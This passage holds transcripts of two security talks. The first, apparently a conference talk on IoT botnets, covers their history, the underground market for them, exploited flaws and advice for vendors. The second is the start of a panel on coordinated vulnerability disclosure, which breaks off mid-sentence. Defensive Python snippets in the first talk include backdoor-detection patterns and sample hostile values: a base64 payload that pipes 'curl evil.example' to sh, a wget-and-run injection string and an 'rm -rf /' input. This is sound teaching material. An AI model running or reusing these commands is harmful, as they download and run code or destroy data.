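    return bool(SHELLSHOCK_RE.search(header_value))

# The canonical public test string versus a benign User-Agent:
print(looks_like_shellshock("() { :; }; echo vulnerable"))  # True
print(looks_like_shellshock("Mozilla/5.0"))                 # False
```

Because the signature is so distinctive, mass scanning for Shellshock is trivially visible in web logs, which is part of why researchers could watch these botnets spread in real time.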
So people were scanning the entire internet for Shellshock vulnerabilities, because they were all over the place, but they were very, very common in a lot of IoT devices. When this was happening, though, there were actually a lot of different bots being distributed, because there hadn't been as many leaked sources as there are now. You may have heard of Kaiten, which is an IRC-C2-based botnet that was spread a lot, as well as Perl bots that are literally just DDoS bots written in Perl. The source code for this was leaked in 2015 and a lot of people started to work on it, and collectively, it's hard to choose one name for them, but collectively I would say these would be categorized as Qbot, which is unrelated, again, to the Qakbot malware, which people also call Qbot. And yeah, new devices that are still vulnerable to this exact same vulnerability appear online, like, newly, to this day. Fast forward a couple of years: Mirai came out in 2016. It was used in some famous DDoS attacks, like the Dyn DDoS attack and the ones on Brian Krebs and some other people, but it was leaked shortly after some of the bigger DDoS attacks happened, and people started to use it immediately, because it was a lot more streamlined than the previous generations of DDoS malware. A lot of the older stuff was really simple one-file bots and servers, very basic stuff over telnet. Mirai was a lot more streamlined; it was very modular, with different files that made it easier to plug in new exploits, and it also made it easier to have access control for the users coming on. It also had a bit better code. Definitely still not the best, but a lot better than the previous code for Lizkebab and Lulzbot. It also had a SQL server in there, which made running the server a lot easier for them.
And it seems like everybody has a botnet fork these days. Since then, other pretty major IoT botnets have come out. A big one you may have heard of was Satori, or Fbot, or Okiru, a pretty well-known Mirai fork that's a bit different from some of the others, because a lot of them are just very copy-pasted Stack Overflow answers fit into some Golang and C code, but the person doing this one definitely knew what they were doing a bit more than most people. That person actually just went to jail recently. We've also seen BrickerBot, which is the botnet that would basically just infect and break IoT devices; there have been a few iterations of it, one in 2017, and then one recently, I think by a 13-year-old kid or something like that. A newer, really interesting one is Kaiji: Golang-based, cross-compiled, an SSH brute-forcer, and it actually installs a rootkit, or tries to establish persistence. It's really interesting; I'll get into that more later. Access R is another one that I've seen; I just threw it in there because I didn't hear anybody talking about it, but it's more modular, still crappy. Then there are Bitcoin-miner botnets that you may have seen. It's harder to do Bitcoin mining on an IoT device, because they don't have much CPU power and no GPU, but they're still out there. And I also did a write-up on some Mirai variants that are targeting FPGAs and some really exotic architectures, which I have a link to in the citations at the end here, or you can go on my website and see it. So yeah, botnet activity growth: similarly to Qbot, Mirai just started popping up all over the place once it was leaked, and there became basically a huge marketplace for people trying to sell spots on the botnet, right?
There were reseller markets, affiliate programs, and incentives for growing it, and also booting itself: DDoSing somebody's home router became a really common thing for people to do, because it's a way to knock people offline, especially if they're mad at them in Call of Duty or something. So yeah, it basically just became the thing people do. And as these things develop and grow, a thousand monkeys at a thousand terminals will eventually take out the internet, and that's kind of what's been happening. So we'll get a little bit into the scene here. The botnet scene at a glance: there are entire communities dedicated specifically to just one botnet or one botnet group, and they're usually talking on Discord, sometimes on forums or IRC. There was definitely more IRC back in the day, when people would have C2s connected to IRC, but nowadays it's more Discord. Advertising is done on literally every single social media platform you can think of; I think somebody even found botnets being advertised on Pinterest, but yeah, if you go on Instagram or YouTube and just search "botnet" or "qbot" or "botnet setup", you will find somebody advertising their latest slammin' botnet. Booter time is generally sold for DDoS through a web panel or through a telnet interface; that's the main thing people are trying to do, just sell time on the botnet. You'll see here on the bottom, it might be a little small for some of you, but there are some advertisements for different botnets, and also some videos on how to boot people offline and how to do it using just an Android. "Best Booters 2020": these all have hundreds of thousands of views too, so these are people that are really going hard with the advertising. So, the sources. I talked about how the sources have kind of been modified and passed around to people.
They're usually distributed as zips or RARs or whatever, and from what I've seen they're sold for about $300 to $500 USD. The authors typically change very little of the codebase; it usually just involves something simple, like changing the ASCII art or changing the variable names, something like Ctrl-F and replace. Sometimes they might even add a new exploit, which is always interesting. Exploits themselves, to load bots, are sometimes sold, but with a lot of them you can literally Google any part of the script and you'll find the Exploit-DB link where they took it from. The ones that are sold, from Exploit-DB or Metasploit modules, are usually backdoored, and it's really funny: they just have a base64 blob that runs, like import os and then just run this, import sys and run this, or whatever. And when I was going through and finding a lot of these sources, I found that when people would scam each other, or rip somebody off, or get in a fight with someone, they would leak each other's source code, which is great for threat intel people and reverse engineers who want to figure out what's going on, because it would just be like, oh hey, here's this person, here's everything they've done, here's their botnet, and here's their code, and you can just scoop it up and take a look at it. So, selling spots is the primary means of revenue. As I said, they're typically sold in weekly, monthly, or lifetime plans. You can see a breakdown of plans over here; pretty cheap too. The "lifetime" plan is always really funny to me, because it really just means for the duration of the bot's lifetime, and sometimes that doesn't last longer than three days or a month, depending on how bad their operation is. More enterprising people, people who are a bit more advanced, might use a web stresser, and they can sell access to that, with user accounts and everything, through a web browser.
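As an aside, those backdoored base64 blobs are trivial to spot statically. Here's a minimal sketch in Python; the pattern list and the sample "exploit" below are my own illustrative assumptions, not taken from any specific sold script:

```python
import base64
import re

# Patterns that commonly indicate a decode-and-execute backdoor in
# "sold" exploit scripts (illustrative, not exhaustive).
SUSPICIOUS = [
    re.compile(rb"exec\s*\(\s*base64"),
    re.compile(rb"eval\s*\(\s*base64"),
    re.compile(rb"base64\s*-d\s*\|\s*(sh|bash)"),  # shell one-liners
    re.compile(rb"b64decode"),
]

def find_backdoor_indicators(script: bytes) -> list:
    """Return the suspicious patterns that matched the script."""
    return [p.pattern.decode() for p in SUSPICIOUS if p.search(script)]

# A hypothetical backdoored "PoC" hiding a payload in a base64 blob.
payload = base64.b64encode(b"import os; os.system('curl evil.example|sh')")
sample = b"print('cve poc')\nexec(base64.b64decode(" + payload + b"))\n"

print(find_backdoor_indicators(sample))          # flags the blob
print(find_backdoor_indicators(b"print('hi')"))  # clean script: []
```

A real triage pipeline would of course go further (decoding the blob, recursing into nested encodings), but even this catches most of the lazy copy-paste backdoors described above.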
There have been a few big web stressers that have been taken down, and some of them are still up; web stresser source code has leaked too. There's so much surrounding a stresser that it adds a layer of abstraction that makes it harder to manage. And then, finally, some people act as resellers, and they get a cut of the sales over time. So who runs a botnet? IoT botnet operators, based on what I've seen in the scene, are usually pretty young: high school age, sometimes college age. They're somewhat experienced with computers, but they're usually not developers. They learn a lot through YouTube and through text files, a collection of which I have in the GitHub repo that I'll explain in a little bit. These are just tutorials on how to set the botnets up: basically how to spin up a box and do the basic things, like compiling with GCC. A lot of the time, though, they really have no clue what they're doing, so you'll see people trying to get support for different botnets who are really confused about GCC or about what access control is. More sophisticated people might have a web stresser or an API, like I said before. They'll use cryptocurrency instead of PayPal, which is very common, for some reason, even though you can tie PayPal to your bank directly. In some cases, people will also use botnets for additional purposes, like proxying traffic. So sometimes you'll see fly-by-night VPN operations that might be doing something shady, like routing their traffic through hacked routers, and that's somehow their VPN. So why run an IoT botnet? A lot of the reasons are the same as for most malware, but there's a lot that comes with the fact that there are a lot of younger kids involved. They usually do it for money, because people can earn money from the sale of botnet spots; a lot of people also do it for attention.
People seek attention for stuff even when it's not a DDoS and it's just a regular production outage. Some people might say, oh yeah, my group DDoSed these people and we're going to extort them for money, and then you look at the target's status page and it says, sorry, we had a blip updating this thing and we're back now, which is always awesome. Supply and demand is definitely a factor: people want to DDoS each other, and wanting to meet that demand is natural for any young entrepreneur. Revenge is also big. I see a lot of people claiming that somebody doxxed them or DDoSed them, and they want to get back at them by getting their IP and booting them offline. People are also inspired a lot by past attacks: they've seen what happens when somebody's DDoS takes out the internet, and they want to be doing that. And also, it's incredibly easy to set up an IoT botnet. So let's take a little bit of time to go over the architecture of DDoS botnets. As I said before, earlier botnets used standalone bot files and C2 files that were just compiled with GCC, or uClibc for cross-compiling. They were very, very simple to set up and deploy. Some of them used IRC for command and control; they'd have very bare-bones IRC clients embedded within their bots. But Mirai modernized this: it has a custom C2 protocol, and it has a SQL backend for tracking bots and all that. Web stressers will use PHP and some other API stuff for managing the bots, so it's definitely evolved a lot from what it was like five years ago, which is interesting to see. The life cycle of a botnet is usually very, very short; you don't see them for very long, generally not over a month or two.
Basically, somebody will set up a C2 on a lax VPS host, they'll scan for devices, they'll get some bots into their botnet, they'll advertise their spots, and then use it. And then the takedown goes one of two ways. Either somebody like Bad Packets Report will tweet out their botnet and tag the web host, and somebody will notice it and get it taken down, or somebody else's botnet will start kicking their bots off the devices, and they won't be able to keep up and they'll lose power. And then it just keeps happening again; it's the same thing you see over and over. This inevitably leads to a king-of-the-hill game for botnets. They're very territorial. People are targeting one specific type of device with one specific vulnerability that they've coded into their variant, and when somebody else gets the same idea, they'll start attacking it too and getting their own bots on there. Anybody who touches the device usually already has root access, but the device might have some weird file system, or there's no way to really reconfigure it, or they might not know how to reconfigure the device to kick everybody else out. So basically every bot will only last as long as it can before somebody else takes its place. And there are really no repercussions for this, so everyone's just kind of slamming on different IoT devices. Picture being a botnet operator watching your bot count drop. So evasion is definitely an interesting aspect of this. There's a lot of very simplistic evasion that you'll see here. This one up at the top is somebody just renaming their process to dropbear, which, I guess, works, but it's also used by everybody, so then everybody will just kill the dropbear process once they log on.
But realistically, this is not to hide from any sort of firewall or AV or anything; it's only really used to evade other botnet operators. Beyond things like process masking, they might learn about a different area of the file system that they can put a bot in, or they might hide a backup bot with something like a cron job. It's always very, very primitive and very, very bespoke. I actually had a whole code review section that could have been an entire talk on its own, but I had to cut it for time; there are a lot of very strange ways that people try to do evasion, which I would love to talk about at another date. And so, bot killing: as I said before, people do this. Take a look, if you can see it on the side here: here's an array that's just full of a ton of different bot names, and every time they update this botnet, which I have multiple versions of, they add more and more of these. You'll see they do things like iterate from one to however many and kill every process called that, or every single version of one specific bot, "Jack by Nips" or whatever, "Two-Face". People are aware of the different botnets that are operating and what they name their processes, and they put those into their scripts. It's a cat-and-mouse game, because nobody can fit everything in there; otherwise their binary is going to be full of strings that are ultimately going to get detected by people reverse engineering the malware. And not some, not most, but nearly all bots and C2s, I would say all, have really, really silly vulnerabilities that make them incredibly easy to knock offline. I don't really see too many of these techniques utilized or advertised by people, but in my next slide I'll show you something interesting, I guess. So here's my non-live demo of a C2 killer.
This is something that I found, and I was definitely not the first person to find it, but it was part of my testing when I was researching these different things. It's incredibly easy to kill Mirai C2s. Take your screenshots or whatever; I already put this out on Twitter at some point. But yeah, if you send this to either the admin port or the heartbeat protocol port, it just segfaults the Mirai C2. And I've never seen anybody fix this; it's in every version of Mirai that I've seen. Some people have claimed that it was fixed, but after reviewing every single one that I could find, I've never seen that. And so, the last little bit on the botnet scene here. When I was going through and doing this work, I ended up creating a tool to help me track all this stuff, and I put it out on GitHub. It hasn't been updated for a bit because I've had too many other projects to do, but it's a static analysis and classification tool for zip files and binaries and things like that. It just feeds everything into a big Elasticsearch database. I'm taking the next week off work, so I'm going to take some time to push my big update to it, but if you want to check it out, definitely do. I have some new things in the API, different symbol hashes and key extraction techniques in there. It was mainly for me, for fast analysis, because I was basically feeding either new source code or new bot binaries into it and tracking them, but it works for other malware too. Also, I had a Twitter account called Threatland that was deleted by Twitter for some reason, but that was the name of the project that I used to track all these sources.
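The core of the "classification" half of a tracking tool like that can be surprisingly small: hash each sample and tag it by known family-indicator strings. Here's a toy sketch in Python; the indicator table and the fake sample bytes are my own illustrative assumptions, not the actual tool's ruleset:

```python
import hashlib

# Illustrative family indicators: strings commonly left in bot binaries.
INDICATORS = {
    "mirai":  [b"/bin/busybox MIRAI", b"killer_init"],
    "qbot":   [b"BOGOMIPS", b"gayfgt"],
    "kaiten": [b"KAITEN"],
}

def classify(sample: bytes) -> dict:
    """Return a sha256 plus any matched family tags for one sample."""
    tags = [fam for fam, strs in INDICATORS.items()
            if any(s in sample for s in strs)]
    return {"sha256": hashlib.sha256(sample).hexdigest(), "tags": tags}

# Fake "binary" containing a Mirai-style busybox marker.
doc = classify(b"\x7fELF...junk.../bin/busybox MIRAI...killer_init...")
print(doc["tags"])  # ['mirai']
```

In the real tool each resulting document would be shipped to Elasticsearch; the point here is just that string indicators plus a content hash already get you useful family grouping across hundreds of leaked sources.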
So I have, like, every Mirai and Qbot and other botnet source, even beyond IoT; I track them all in a big repo called TLBots, and I have a few other repos, for things like fraud tools, if you want to check them out. There's literally a clone that's like a gigabyte's worth of zip files of every malware source code that I could find. Yeah. So now we're going to get into talking about vulnerabilities, and this aspect is a bit more about stuff for devs, because I wanted to give developers who are working on IoT devices the information to take all of what I just said and put it into context for their actual security architecture. So here we are, peering into the void. If you've ever gone on GreyNoise, they have a lot of tags for different vulnerabilities that people are scanning for, or just classes of malicious traffic. If you do a search just for Mirai, you'll see here, it's very, very tiny, that there are four and a half million results for unique devices that have been scanning with Mirai-like traffic. That gives you a rough idea of how many devices are actually infected and actively scanning. The other one is a Shodan search for that "hacked router help SOS" default-password thing; that hack happened like four years ago, and there are still 6,500 devices that have been hacked and still have this hostname. So it's always heartwarming to see, I guess. So what types of vulns are exploited by these botnets? It's always very basic stuff. We're talking about weak auth and auth bypass: either admin/admin as the credentials, or that page that you can run OS commands on that doesn't actually need a password to interact with.
There's also command injection, like Shellshock and other really silly command injection stuff. There are also a lot of common exploits in specific services and libraries, like the Realtek UPnP SDK, which had a vuln that was in everything, so many different devices. GoAhead and ThinkPHP also had vulns that were in a lot of places; thousands and thousands of devices were affected by GoAhead. More rarely, though, you'll see actual shellcode and binary exploits, which is always interesting, because you'll have devices that are all using the same base address, so you can do a shellcode exploit very, very easily. They're not as common as you'd think; I think it might be because people don't know how to write shellcode, or how to inject shellcode in C when they're writing their bots, but who knows. You'll see them in bot loaders for sure. A lot of other vectors involve previously compromised devices: a few people sell lists of compromised devices for specific categories of devices. I don't actually know if there are any in my repo, but I have seen a bunch of them, where people are basically just passing those lists around. So here we're looking at the most targeted devices, if you want to see which vulns are most leveraged by these botnets. I have a big table here: I basically went through every source code that we could find, several hundred unique source codes, and these are the vulns that people are using. A lot of them don't actually have any CVE or CPE or any vendor acknowledgement, so you can only really find them by looking up what the traffic is, or what the command injection attempt in your log files was. Actually, more than half of these don't have any CVE at all. The AVTECH one, which I think is being used in the IoT CTF right now, doesn't have a CVE or anything.
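Since command injection keeps coming up: the root cause in a lot of these device web interfaces is passing a request parameter straight into a shell. A minimal, hypothetical illustration in Python (the function and parameter names are mine, not from any specific firmware), contrasting the classic bug with the safe argv-list pattern:

```python
import subprocess

def ping_vulnerable(host: str) -> str:
    # The classic firmware CGI bug: user input concatenated into a shell
    # command. host = "8.8.8.8; wget http://evil/b -O /tmp/b; sh /tmp/b"
    # would download and run a bot. Shown for illustration; never do this.
    return subprocess.run("ping -c 1 " + host, shell=True,
                          capture_output=True, text=True).stdout

def ping_safe(host: str) -> list:
    # Validate against a strict character allowlist, then build an argv
    # list so nothing is ever interpreted by a shell.
    if not host or not all(c.isalnum() or c in ".-:" for c in host):
        raise ValueError("invalid host")
    return ["ping", "-c", "1", host]  # pass to subprocess.run without shell

print(ping_safe("192.168.1.1"))
try:
    ping_safe("8.8.8.8; rm -rf /")
except ValueError as err:
    print("rejected:", err)
```

`ping_safe` returns the argv list rather than executing it, just to keep the sketch side-effect free; the key point is the allowlist plus the absence of `shell=True`.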
And it's just a blog post that people have written about it. It's the same with some of these Netgear ones: the Netgear DGN1000, a huge one that people have exploited, I've never seen a CVE for. The HNAP stuff, Vacron, Zyxel, even, actually, GoAhead WebServer. And these aren't even the SSH or Telnet brute force stuff; a lot of this is buffer overflows or command injection, and some of these aren't even being tracked by anybody. When a new exploit comes out, though, bot scanners will really just immediately start trying to load bots with whatever PoC people have published, and it's usually IoT bots, and it's very annoying. So the infections spill over from that. These malware families are running on a super diverse array of architectures; every architecture you can think of has a Mirai variant for it at this point, because of cross-compiling. But this means they can affect other hosts that aren't IoT. So people will try to get Mirai onto things like web servers, using Drupalgeddon or Apache Struts or CouchDB or whatever is running, to have that be the scanner as well. This sort of infection spillover is really common, and sometimes you'll see IoT botnets using Drupalgeddon and you're like, what router is running Drupal? It's because they're trying to get onto everything. So why are these devices so easy to exploit? We talked about this in the last talk here: supply chain issues, and it's very difficult to validate the supply chain, which is a big one. There's vulnerable software and libraries that people use that they might not be able to change, or they might not have the people to even make the changes.
Easy-to-guess default passwords are a huge one, and devices by default doing port forwarding and listening on the internet. Giant lists of vulnerable devices are passed around, which makes it even easier for people who don't know what they're doing to just start exploiting. And it all comes down to insufficient or non-existent security practices in development. So we're going to get a little bit into firmware vulns now, and security practices. There was an awesome talk, I think two years ago at ShmooCon, about firmware vulns by CITL. Vendor security practices on a binary level are almost non-existent, and there's even regression analysis showing that firmware is actually becoming worse, with more vulnerabilities introduced, over a 15-year data set, which is insane to me. You see here every vendor that they looked at, and anything that's closer to the edge here has more of these things like stack guards, non-executable stack, RELRO, or ASLR; things closer to the edge are scoring higher, which means more of their binaries have these mitigations in place. But as you can see, there are very, very few that actually have anything on the graph, and the ones that do only have one or two. It's kind of sad. You want all of these things to be blue all the way out, and there are just thin lines of blue, which is really disheartening. So why is firmware so difficult to maintain? There are so many reasons. I've done firmware development for embedded devices before, and even though I loved the experience, I could still see all the echoes of this throughout the process, right? Rearchitecting cost is a huge thing; cost is usually the biggest factor in why things aren't changing.
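You can check a binary for a couple of those mitigations yourself by looking at its ELF program headers: a PT_GNU_STACK segment without the execute flag means a non-executable stack, and the presence of PT_GNU_RELRO means relocations get write-protected. Here's a rough sketch in Python; the parsing is deliberately reduced to the decision logic, and the sample segment lists below are synthetic rather than taken from a real firmware image:

```python
# ELF program header type constants (from the ELF gABI / GNU extensions).
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1  # segment flag: executable

def check_mitigations(segments):
    """segments: list of (p_type, p_flags) tuples from the program headers.
    Returns which of two basic hardening measures appear to be present.
    Note: a missing PT_GNU_STACK is reported as not hardened, since old
    toolchains default to an executable stack in that case."""
    report = {"nx_stack": False, "relro": False}
    for p_type, p_flags in segments:
        if p_type == PT_GNU_STACK:
            report["nx_stack"] = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            report["relro"] = True
    return report

# Synthetic examples: a hardened binary vs. a typical IoT one.
hardened = [(PT_GNU_STACK, 0x6), (PT_GNU_RELRO, 0x4)]  # RW stack + RELRO
typical  = [(PT_GNU_STACK, 0x7)]                        # RWX stack, no RELRO
print(check_mitigations(hardened))
print(check_mitigations(typical))
```

Tools like `checksec` or `readelf -lW` do the same inspection (plus PIE, stack canaries, and more) on real binaries; the point is that these properties are cheap to audit across an entire firmware image.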
But you can also be locked into a vendor contract, or locked into a middleware contract where you can only use drivers from one supplier for one piece of your kit, and you have to use it for a certain period of time. You might have unsupported chips or hardware to work with. Another huge thing is outdated toolchains: you might be using a toolchain from like 2005, and that's how you build everything in 2020. There are also hardware constraints; sometimes your hardware itself might not support the SSL version that you need. That was an issue I've had to deal with: trying to figure out how you can jerry-rig a newer SSL and encryption scheme and support newer versions of TLS in firmware that's 15 years old. Sometimes you also need to maintain backwards compatibility, which makes this stuff really hard; you have to include things that you might not want to. A lot of it, though, is a lack of dependable updates for users to update their devices. Even if you have all the other things in place, sometimes people don't have a way to actually update the devices without some complicated process. Poor communication channels to even tell people about vulnerabilities are also a big thing, and vendors might not have any channels for reporting bugs or telling people about bugs. And then there's the lack of modern security measures, like secure boot, the binary hardening we talked about before, or code signing; those are not going to really be in place, and it's hard to get them back into your pipeline when you have to do a bunch of testing and you only have a couple of people working on the thing.
So why do we see a lot of this older stuff still working? Sometimes you'll actually see Qbots or Kaiten bots or even Perl bots trying to exploit stuff, in your logs or when you download a binary, and it's because the vulnerabilities are still there, right? This is an analogy I distilled from Mudge: in mining, there are indicator minerals that suggest other minerals might be there. The security vulnerabilities that we're seeing indicate that security practices are not being followed, which means that the older vulnerabilities are still going to work. So we're still seeing command injection here in 2020, and you can still run a Qbot or a Perl bot on the device. It means there's really not much going into the actual process of making the binaries and devices any better. And what's interesting is that this is rare in other classes of malware, say for desktop computers, because here there's no patch you can apply across every device. Each time a new vuln comes out, all these new devices get added to the pool, but there are still all the routers from 2014 that have Shellshock vulnerabilities in them, and DVRs that still have auth bypass in them, and those all just stay in the pool. So people are just trying the same old techniques, and they're still getting the devices that they would have exploited before. It's kind of frustrating. So, moving forward: this is the big thing for vendors and for developers of firmware and embedded devices. What can we actually do to solve any of these problems? We can only really fix them by having better development practices for security, by meeting the developers and the vendors where they're at.
Because we want them to be on top of their game and actually doing the work that we'd like them to put in, so that our toaster isn't DDoSing somebody because of some Mirai variant run by a 14-year-old kid. So we have to actually talk to vendors in the terms they already know, and within the way they're already developing things. For vendors, my big advice here is to invest in developer training, establish best practices, create security testing pipelines, and encourage researchers to actually find vulns and disclose them properly. We can mitigate some of the existing problems by encouraging safer use of IoT devices, but that only goes so far: imagine trying to explain to your parents how to turn off port forwarding on their router. They're not really going to understand it the way that you might, I mean, they might, but it's sometimes hard to get end users to follow your guidelines at all; they might not even be aware of them. But that's one specific way we can mitigate this. Establishing best practices, though, is a thing I wanted to highlight for a second: auditing your development cycle itself. It definitely depends on what you're building, and you have to tailor it to that, and be able to audit and say, hey, yeah, we are using C, we are using this toolchain, GCC or uClibc or whatever, to develop our firmware. There are best practices for these things. OWASP is something I used when I was doing firmware work: I had developers look at some of the OWASP cheat sheets, on toolchain hardening, on input validation, for web apps, and on other things, to learn the best practices that are out there. And there are tons of different resources like this.
I just point to OWASP because it's very accessible for a lot of people, and it's free. Another big thing is CIS benchmarks. Depending on what you're building, there are security benchmarks that you can follow, which are super useful. You can even automate them; I've done Ansible-driven CIS benchmarks before, and you can build those into toolchains pretty easily. And if you really need to, hire a consultant to come in and do all this work with you and work through it with your team. That's definitely a big one for vendors. Vulnerability disclosure, though, is probably my favorite one to talk about, and the biggest one. When you do find people who are actually poking at your stuff, allow them to disclose vulnerabilities. Please, if you are a vendor and you're listening: it's 2020, there are ways now. You can have a VDP, you can have a bug bounty. You have to go through the proper channels and make sure it's right for you, but there are a ton of resources; disclose.io has really good legal language and other resources for vendors. People who do IoT research sometimes either get no response, or they sometimes get sued for something. Establish a security contact, and read the emails. security.txt is a really easy way, on your vendor website, to just list an email address that somebody who has an issue or a vulnerability can contact, without feeling like they're trying to chase you down. Because how many times do you see people on Twitter going, hey, does anybody have a vendor contact for this company, and nobody responds? If we have to go on Twitter to ask about this, not only does it draw more attention to the vulnerability, but it also makes you look bad. So definitely keep up with that stuff.
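For reference, security.txt (standardized as RFC 9116) is just a plain text file served at /.well-known/security.txt on your site. A minimal example, with placeholder values rather than a real contact, might look like:

```text
Contact: mailto:security@example.com
Expires: 2026-12-31T23:59:59Z
Policy: https://example.com/security-policy
Preferred-Languages: en
```

Contact and Expires are the required fields; Policy, Encryption, and the rest are optional additions you can layer on as your disclosure process matures.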
Work with researchers, too. People who are bringing stuff to you want to help you; somebody who just wants to use your device for crypto mining or to DDoS some kid on Minecraft is not going to tell you about it. So if you have a researcher who's here and talking to you, they want to help you, and you should definitely heed their advice. And have some open channels with your customers to get the word out about vulnerabilities. Whether you handle it internally, or you submit CVEs and then post them on Twitter, whatever you do, just have some way for people to know to update their devices. Ultimately, all of these are elements of a vulnerability disclosure program, so if you put this all together, you have the baseline for what you need to actually have one, which is awesome. I also put a quick question out there on Twitter, which you can see; I have a link here. These are some community suggestions for what vendors can do, everything from automatic updates to, and I like this one, making security a named person's problem. So, say, Sherry has to deal with the firmware vulns that come in; talk to her if there's an issue. Other things like minimizing attack surfaces and code signing, all of this stuff is going to be part of the other best practices that you're going to have to implement, but these are all elements that might be good for you to consider moving forward. Default settings should definitely be sane and chosen with security in mind, and also, don't reinvent the wheel. So, final thoughts; I've got about two minutes left. We want to make it less easy for people to run botnets, overall. The supply is already there, the demand is great, everything is set up: people can, off the shelf, get several thousand boxes on a botnet in an afternoon.
Botnet authors are definitely getting a lot smarter, and people are using the messiness of this landscape to take advantage of it. As you see with the Kaiji botnet, which is definitely a lot more advanced than previous stuff, people are going to be using this for more nefarious purposes. And because there's so much going on in this space, it's very hard to pick out who is a nation state trying to get access into your router versus some random kid who has no idea what they're doing. New devices and architectures are always being targeted; as I said, FPGAs, there's tons of new stuff, and you can read the analysis I wrote. If you don't act soon, the new products you put out are already going to be dead on arrival and exploitable once they come out. So yeah, the Q&A for this is going to be done in the DEF CON Discord, as you might have seen in the Twitch chat. If you have questions, ask there, or you can always hit me up on Twitter at netspooky; my DMs are open. I've got some shout-outs real quick. Shout out to the Safari Zone crew, the people who have always been there to look for weird stuff on the internet; hopefully we'll have a zine coming out soon. Threatland, and everybody who helped out with that project to collect sources. And of course, the entire community of ThugCrowd. A special shout out to Hermit for helping me go through so much of this, for being such an awesome person to look at logs and other weird stuff with, and for being able to tell me a lot of the interesting things that she has found. Andrew Morris and GreyNoise, thanks so much for letting me use your data set before it was even publicly available. Thanks to Mudge for coming in hot with some hot takes for me when I was building this talk. Check out Ilya's IoT Village talk on emulating IoT devices and malware, because we actually did a lot of that when I was writing this talk. And thanks also to Dave for the theme song.
So I'll have the slides out; I'll tweet them, so just follow me on Twitter and you'll see them. I have citations if you want to read them. But yeah, thanks, everybody.
This talk discusses the rise of IoT botnets, the culture that surrounds them, and the vulnerabilities that enable their continued existence. I will present analyses of major botnet families, discuss exploits and vulnerability classes in IoT devices, and examine the rapid growth of these botnets for commercial use. I will also discuss newer innovations in IoT malware, and outline some of the ways that vendors could reduce their impact moving forward.
10.5446/50732 (DOI)
From your perspective, what does CVD mean to you, and what are your motivations when you're working on an issue and you need to disclose something? So I think the main point of CVD is, of course, to protect users, and my main thought is a bit historical. I've been around since the 90s, when disclosure was: you find a mailing list where other hackers hang out and you zero-day everybody, and nobody really cares. Then came responsible disclosure, which is the predecessor to coordinated vulnerability disclosure. The problem with responsible disclosure is that it was really made to shame hackers who didn't follow the protocol desired by industry types. The current iteration, coordinated vulnerability disclosure, instead of trying to be coercive, tries to actually work with people who want to submit issues, and it is much, much improved over that. It does a much better job of making sure that all parties to a vulnerability disclosure, meaning vendors, customers, and hackers, have their needs met. So that's what coordinated vulnerability disclosure is for me. Awesome. Daniel, another researcher perspective: what do you think about coordinated vulnerability disclosure? So we are interested in understanding how things work, and sometimes that involves understanding how things work in ways that are not supposed to happen, which we then call a vulnerability. And of course, we then want to figure out the truth behind it, and that involves talking to the vendor. Very often they tell us that we got something slightly wrong, and that is an opportunity to correct those mistakes before we submit or publish the paper. But also, from my perspective, it's the only ethical thing to do to protect the customers, to protect the people who are using these products. And for me, I'm not in this game with finding vulnerabilities as a motivation in itself.
My main motivation is finding the truth, finding a better understanding of how things work. That's awesome. Katie, you've had a lot of experience monkeying around with CVD. What does CVD mean to you? Hold on a minute, Lenea. All right. So CVD means to me. So when I think about it, I think of it from a risk-based perspective. And so what CRob is alluding to here is that my background is government in nature. So I spent about 15 years in the US government, 12 years of that in the US Air Force. And then several other years at the Department of Homeland Security, where I ran the vulnerability disclosure programs that most people are familiar with. So like the NIST NVD program and the Carnegie Mellon CERT/CC program and the MITRE CVE program. So I was a sponsor for those programs. So in a single year, 2017, we coordinated and disclosed 14,800 vulnerabilities for public disclosure. So that's 14,000 IT vulnerabilities and about 800 ICS vulnerabilities. In the following two years, so 18 and 19, we coordinated and disclosed over 20,000 cybersecurity vulnerabilities. So I've kind of seen things from lots of different perspectives. And when I think about CVD, I think about balancing risk, right? So CVD is really a process. And when you're going through this process, understand that every organization is going to treat it differently. Because there isn't just a standardized, one-size-fits-all kind of thing here. There's differences that are going to happen across the coordination stack. So if you're looking at digital services, it's going to be different from software, which is going to be different from open source, which is going to be different from hardware or ICS, like all the differences are going to come into play there. But the overarching sort of thing, the big takeaway here, is that CVD is balancing risk. 
It's all about making sure that there is an opportunity for the product vendor to fix the problem before an adversary has the opportunity to take advantage of that. So like it's all about protecting the end user. And I think everybody that I've ever met in the entire ecosystem is all focused on that. Like we may be speaking different languages, we may talk past each other, but I think that everyone is trying to protect the end user. So to me, that's what CVD is about. That's awesome. And remind me to circle back to you later in our talk. Talk a little about some of the psychology behind some of this. Oh yeah, absolutely. I would love to hear my dearest friend Lisa's thoughts on coordinating vulnerability disclosure and some of the motivations that you've seen, or what's behind your motivation. Yeah, so I think I've seen sort of an evolution of what we do now. I think Heartbleed was sort of the big start of where we paid attention, realized we all needed to come together a little bit, and then Spectre and Meltdown sort of brought us even closer. So my thought is that not only do we work with the researchers, but we work across the industry to make sure that we're all doing our best to protect our customers. So like Katie was talking about, it's really our end users that are our focus, and making sure that we have the right people involved to be able to solve the issue and then provide a security update so that our customers can get it and be best protected. And I didn't say CVD. Oh, you just did. I know. Yeah, yeah, yeah. So Omar, you've been doing this for a while and you work for a very large company. So I'm sure you get the opportunity to see a lot of different vulnerabilities. So what does the whole process mean to you? What are some of the motivations you've seen? Yeah, I think that pretty much everybody has summarized it very well: it's protecting the end consumer at the end of the day. 
But I see it as a very, very complex ecosystem, right, that we're trying to actually solve. And Katie, you know, mentioned on one side hardware, on another side software; then if you decompose that, you have open source, which we're going to probably talk about a lot in here. And you have things that, you know, perhaps you cannot even control. I have had a, I guess, a pleasure or not a pleasure in some cases, where we're looking at vulnerabilities and in some cases, whenever we try to actually solve the issues, the companies don't even exist anymore. That's another predicament, you know, that in some cases we actually have to take into consideration, and it's a fairly complex ecosystem. And at the end of the day, what we have to actually put our heads together on is how we can modernize our practice in a way that not only, yes, we deal with a single vulnerability, we reproduce it, we actually fix it, we find the patch, but how can we accelerate that process so that everybody's talking somewhat the same vocabulary, or at least they can understand each other. And then we also understand the overall risk, right, and how to prioritize things and so on. So it's fairly complex; we could actually talk about it for quite some time, and that's what we're here for. But that's some of the initial perspective that I want to share. Thank you, I appreciate that. I want to talk about something we touched on in one of our prep calls. We have Anders and Daniel that come at this research angle from slightly different angles. So maybe, and you two gentlemen can figure out who wants to start first, but thinking about the perspective of academia versus a professional bug hunter security researcher, maybe you can describe some of the particulars in either area, and maybe what are some of the differences you might see between those two different types of 